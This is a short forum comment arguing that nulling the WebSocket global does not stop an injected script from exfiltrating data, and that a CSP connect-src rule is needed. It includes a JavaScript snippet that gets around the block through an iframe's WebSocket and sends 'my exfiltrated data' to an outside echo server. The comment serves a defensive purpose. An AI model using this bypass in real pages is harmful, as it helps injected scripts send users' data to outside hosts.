|
|
|
|
|
|
by odensc
2217 days ago
|
|
|
The window was just one example (obviously not the most optimal method), there are many other ways you could get around it. My point is `WebSocket = null` won't stop someone who is already dedicated enough to inject a script onto your site to steal people's webpack hot reload error messages. Really a CSP with `connect-src` is the only way to fully prevent this. Here's one very simple way to get around your method: WebSocket = null
let el = document.createElement("iframe")
document.body.append(el);
let ws = new el.contentWindow.WebSocket("wss://echo.websocket.org")
ws.onopen = () => ws.send("my exfiltrated data")
|
|
|